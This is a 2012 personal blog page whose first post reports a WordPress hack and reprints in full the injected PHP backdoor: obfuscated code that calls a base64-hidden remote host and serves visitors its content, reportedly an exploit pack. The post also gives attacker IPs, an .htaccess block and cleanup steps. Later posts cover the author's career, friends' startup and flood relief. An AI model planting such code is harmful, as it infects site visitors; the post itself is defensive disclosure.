WordPress Sites all HACKED!

Posted on February 9, 2012 by

It’s been a while since I’ve updated, and this is for shame because I have a lot of stuff happen to me and a lot of neat shit to say sometimes.

But, the News Headline is: “ALL MY WORDPRESS SITES WERE HACKED.”

I went through each of these sites and found that the only thing in common was they’re WordPress and most (but not all) had the “All in One SEO” plugin.

There are other similarities, I’m sure, probably as many as there are differences.

Regardless, here’s how they got in…

From my log files (FTP and general): /home/jexanaly/ftpchk3.php a _ i r [mainftpaccount] ftp 1 * c Mon Feb 06 07:49:31

Where [mainftpaccount] is the name of my main FTP account. They put the “ftpchk3.php” file and “counter.php” in the root from the IP 61.191.190.51 and then, within a half hour, they start hitting my site with a download and then immediate upload of every index.php file in ALL of my folders… from this IP: 188.138.112.15

They had to be targeting WordPress though, because they also went into each of my WordPress Theme Folders and edited the “footer.php” file and “home.php” if it existed (in addition to “index.php”).

They put this ratbagbastardshit code into each of those files:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = “”;
if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( ‘aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’).’?ip=’.urlencode($_SERVER['REMOTE_ADDR']).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER['HTTP_HOST']).’&fullpath=’.urlencode($_SERVER['REQUEST_URI']).’&check=’.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]==”O”)
{$sResult[0]=” “;
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

This is a cURL call (uses PHP to pull the content of a URL) to this website: http://hotlogupdate.com/stat/stat.php

DO NOT, REPEAT, DO NOT VISIT THIS WEBSITE.

These scumbagshitwadcrapfaces use the file on that website above to hit you with what’s called an “Exploit Pack” where it’s got just about every virus ever created by some pasty-white 32-year old virgin suckin’ down Mountain Dew and Fritos and trying to take over the world before he levels up or his mom asks him to get his ass out of the basement and clean his room.

So yeah, don’t go there. If you do, you might catch what I got, the “System Check” virus and then the “iexplore.exe” virus.

I fixed “System Check” by restarting into Safe Mode and running MalwareBytes, SuperAntiSpyware, Spybot S&D and CCleaner.

I fixed “iexplore.exe” by loading a six-shooter with one bullet, spinning the chamber, putting the gun to my head, and pulling the trigger. When I realised that I was still alive and that all the crap I’d tried hadn’t worked, I restarted into Safe Mode, ran Combofix.exe (all night too, for despite the fact that it says “Seriously infected systems may take 20 minutes” it was still running 8 hours later…), then ran SuperAntiSpyware, TrojanKiller, MalwareBytes, Spybot, HijackThis, CCleaner (which wipes out too many Windows user settings to be worth it) and then downloaded and installed avast! That seemed to do it, though the handgun would’ve probably been easier.

So, that’s if you’re infected.

If it’s just your poor websites that have gotten hit, then first deny those sunsabiches access from your .htaccess file:

order allow,deny
allow from all
deny from 61.191.190.
deny from 188.138.112.

This will deny the entire IP range. You might miss out on some visitors from China or Amsterdam, but I reckon it’s worth it to avoid the sh*t you’ll get otherwise.

Next, I went through and started fixing the index.php files by getting rid of all that extra code. Off 13 infected websites. It took a long time.

When I looked again, those bastardcockfacehells had come back and reinfected all my files, despite the fact that I changed all my FTP passwords.

So, after you restrict their IP and change all your FTP passwords, you should check out this fix I wrote:

MASSIVE DISCLAIMER: This script uses fopen, fread and fwrite so you must have the appropriate folder permissions. It will also rewrite files that are infected, so DO BE CAREFUL. I tested this bugger by unceremoniously truncating every goddam file on the website you are now on, so I know it works for me, but if you mess with any of that code, you’ll probably nuke your site too. So don’t.

Download “Fix Hacker Shit”.

  1. Download the file and unzip it.
  2. Copy fix-hacker-shit.php to your root directory.
  3. Go to a browser and punch in “http://www.yoursitehere.com/fix-hacker-shit.php”.
  4. Crack a beer, watch it work.

If you don’t see anything, then you weren’t infected.

And if you were, isn’t this way much better than going through fifty eleventy brazillian geedarnfickety folders and changing all the index files back?

Now, for those of you that Googled and Googled and couldn’t find a blasted thing on this subject, here’s some keywords to help others get here:

That’s it. I hope some or all of this helps.

Good Luck and Have a Good Website.

-Judd

Category: Resources | 2 Comments

A New Beginning…

Posted on September 10, 2011 by

When I started this company over 4 years ago, I named it “Jex Analytics” because I loved Web Analytics.  I knew that no matter what I did in All Things Web, I would always be able to fall back on my skills in reporting and analysis.

Not because it’s sexy, because it’s not.  By any means.

Not because it’s safe either, though it pretty much is.

No, I loved analysis and reporting because it was what really told the truth about your success.  You can look at stats and graphs all day, but without something interpreting them into your language, you’ll never really know what they can mean.

And don’t even get me started on rankings.  Rankings are useless if they don’t improve your business, and too many shysters in the SEO industry have been trying to say differently for years now.

Rankings do NOT tell you about your success.

They can, but they’re not all of it.

But, for a while, I had to focus on rankings.  SEO was what people knew how to ask for and what they thought was going to bring them success.  For years, I’ve been telling them that it’s only a step, but not the whole deal.  For years now, only my clients (most of them) have been listening.

So I was an SEO expert for a while.  I still am, but I don’t like most people to know that, because then they’ll want me to weave that Black Magic on their website, and I don’t do that any more.

With the most recent addition to the Exleys Down Under, my life is changing, and it only stands to reason that my business should change too.

In short: Out with the SEO, in with the Analytics & Reporting.

I’m sure I’ll rant later on how important it all is, consider yourself warned.

For now though, an introduction to the next chapter.

Have a Good Website.

-Judd

Category: Latest News | No Comments

I’m Done With SEO.

Posted on April 6, 2011 by

After a few months worth of thinking about it, I’ve decided that I’m not going to offer SEO any longer.

The Sisyphean adventure of trying to educate the marketplace on certain aspects of this industry while still trying to win business and convince people that I’m A) better than my competitors and B) actually good too, was just too much.

I thought I’d get smart, and create a Client Expectations Document, where I outline in precise detail each step of the project.  Where I give minimum time limits to wait for results.  Where I politely make it clear not to ring me, just email me because it’s so much easier for my life.

And these things all got ignored.  Not by everybody, but by just enough clients that I realised I wasn’t actually happy with a new project any more, I was dreading it.  I was waiting with dread for each new client to cause problems, or expect things outside of project parameters, or to simply stop returning my emails…

I started this business because I wanted to help people with their websites.  I wanted to give them analysis and reports that mattered, that made sense to them, that told them important things about their websites.  I started doing SEO because people were looking for it (nobody seems to search "web analtyics expert" much) and because it could pay the bills.

4 years on, and that’s all I’ve been doing… paying the bills.

Actually not quite.  Little by little, I built some tools in PHP and WordPress that helped me keep up on client reporting, Google Rankings, Search Traffic, and AdWords success.  They helped me with Keyword Research, Competition Research, Link Analysis and Overall Website Analysis.  I put them on a website called Jex Solutions, and made it a Membership site.

I kind of figured, "Man, these tools do SO much for MY business and MY clients, I’ll make them available for all!"

Then hardly anybody signed up.  Then those that DID sign up, couldn’t figure out how to use anything.  It was an epic failure.

But, by that same token, it was a tremendous success.  I learned more about what really makes a website successful than I ever would’ve just looking at stats and graphs.

I started a blog, open to other web folks of wonderfulness, called Stone Soup – Recipes for a Better Web.  A place for web professionals to take a no-holds-barred approach to blogging about the web.  A place where we could say bad words as much as we wanted and bag on clients that pissed us off… all with a lesson, of course.

I’ve registered, and have big plans for, Have a Good Website, a site that’s going to have anything from the basics of picking a web designer to the intricacies of finding the right kind of inbound linking plan for your SEO.

I also wrote a book!  A romance, followed by one I’m working on that’s sci-fi futuretasticness.  The books, and the wonderful people I’m involved with in my writer’s group, have inspired me to make a website for authors called Page Buoy.  It’s not bulit yet, it’s in progress, but it’s going to be unique and pretty awesome for writers of just about anything.  I’m stoked.

And finally, wife and I are about to have our 4th child.  Little Boy Blue is due on the 20th and I’m going to take a few months off just to enjoy my last child, my baby boy.

During that time, I’m going to:

Sure, it’s a lot, but it’s what I want to be doing.

Wish me luck.

Category: SEO, State of the Web | 1 Comment

A Nod to Old Friends

Posted on February 11, 2011 by

Back in my college days I was a bit of an outsider as a Montana Mountain Boy at Texas A&M.  I didn’t have a lot of friends and my interests almost solely resided in an altiude > sea level.  I loved hockey though and even though I’d only mucked about on a frozen pond, I got some cheap inline skates, a cheap plastic stick and fashioned a net out of leftover plumbing from the junkyard.

I went out, found a parking lot, and played.  I wasn’t out to make friends or find like-minded folks, I just wanted to play.  But the other stuff happened anyway.  One day a couple of guys, who were from up North too, pulled over and asked me to come and play with them on Sundays.  A great group got bigger and bigger and soon they built a league.  Those two guys graduated and got married and I took over the league, filling my days with the thing I loved most.

Fast forward more years than I’m happy to count out loud, and those two guys are still at it, doing what they love and inviting others in on it.  Through the magic of Facebook they’ve found me again, and have "pulled over" on this Interwebs Highway and said, "Hey, you’re doing something we like doing too!"

They like web stuff, I like web stuff, and we’re all good at it.

They’ve recently launched Cherry Tree and here’s a few of Tay’s words on it:

Our vision is to create a web product that helps parents change the child’s behavior through two mechanisms; 1) positive reinforcement by the parents and other key figures in the child’s life and 2) an incentive based gaming mechanism that keeps the child engaged and habitualizes the behavior.  Or put more simply, think of it as a super duper sticker chart combined with a Facebook-ish status and messaging system that is private to a family.

So, bless ‘em, here’s my two old friends, getting their skates on, grabbing their sticks, and setting a game alongside a busy street.

If you get a chance, pull over and check ‘em out.  You never know how it’ll turn out.

Category: Around the Web, State of the Web | No Comments

Flood Relief Donation Info

Posted on January 14, 2011 by

When I got tired of hearing "oh, just send cash, not goods" I got super stoked to hear that there’s someone here in Perth that’s organising to ship tangible goods to help out for not just the Queensland Flood Relief, but also help for the Gascoyne River Floods up near Carnarvon and also south of Perth to the victims of those horrible arson Bushfires in Lake Clifton.

His name is Cam Wilkie, his outfit is Cambuild, and he actually packs more awesome than a roundhouse kick from Chuck Norris.

From information from his website (for those of you too lazy to click):

Thank you very much for offering your much-needed assistance. Here’s a list of useful essentials that will be transported to the Queensland Flood Appeal over east.

• Tinned food/Pet food
• Toothpaste
• Toothbrush
• Soap/Shower gel
• Shampoo/Conditioner
• Deodorant
• Detergent
• Baby formula
• Nappies
• Battery operated radios
• Sanitary products
• Shoes/boots		 • Camp beds
• Pillows
• Sleeping bags/blankets
• Towels
• Mosquito nets/repellents
• Lanterns
• Torches
• Batteries
• Tools
• Tarpaulin
• Plastic cups, plates, cutlery
• Veterinary supplies


Please box your donations and label them (on the side of the box) to assist in locating and distributing items.

The first truck will be leaving Friday 14th January in the afternoon. This will be the first of a number of trucks which will leave over the next couple of weeks.

Please deliver your items to:

Cambuild, 1/5 Leeway Court, Osborne Park, WA 6017

If you have any other queries please feel free to contact the Cambuild office on

(08) 9244 8522.

cam@cambuild.com.au

When a wonderful gal in my family asked about a dropoff point South of the River here in Perth, I said that if there wasn’t one, I’d put my hand up to run one.

*raises hand*

I’ll run one!  I’m in Langford, so email me for an address (judd AT jexanalytics.com).

I’m planning on making a run to Osborne Park next Friday afternoon, so try and get stuff here before then.

Here’s the best part too, the part I know you’ve been waiting for, this guy Cam rang me and explained that this isn’t just a truckload of your second-hand crap getting dumped on the streets of Brisbane.  This is a corporate-level organised effort involving Salvos and the Red Cross to sort, box, ship, store and eventually distribute items that are relatively non-perishable and are going to be sorely needed in the coming weeks and months.  He did it for the Victoria Bushfires and he’s doing it now.

Yes, the Queensland Government would rather money, who wouldn’t?  For those of us that want to do more than just punch in some credit card numbers and feel smug while we sip our latte and marvel at how dry our feet are, this is right up our alley.

Cam’s got a crew of volunteers sorting things and they will send you home if you try to dump junk.  Bring good items, usable items, that can survive being sorted, packed, shipped and stored.  Do your best to sort them beforehand and I’ll do some sorting here.

When wondering what to donate, the best way I thought of it was to remember what I was after when our house flooded during the huge storm here in Perth last March.

Yes, Salvo’s has heaps of clothing, so keep it, and when I was flooded I was happy enough to dry a t-shirt out, but boots and shoes get wet, armpits stink, mozzies bite, and when all that shits pouring down and wearing you down nothing on this earth feels as good as a nice shower and getting clean again.  Particularly after you’re digging out the wet and mouldy fuzzy slippers from under your bed.

Also the battery-powered/windup radio thing.  One of the most comforting things that got us through a long and lonely, wet, candlelit night was hearing "the world" out there.  Even if it was just some DJ reporting things and playing Bon Jovi for the 17th time that day.  It’s nice to hear from others in your community.

So there you go.  There are going to be pallets of stuff headed for the areas that need this stuff.  It won’t get there tomorrow but it WILL BE THERE when they need it, and that’s awesome.

Email or ring me and we’ll rock from there.

Category: Latest News | 2 Comments

Next »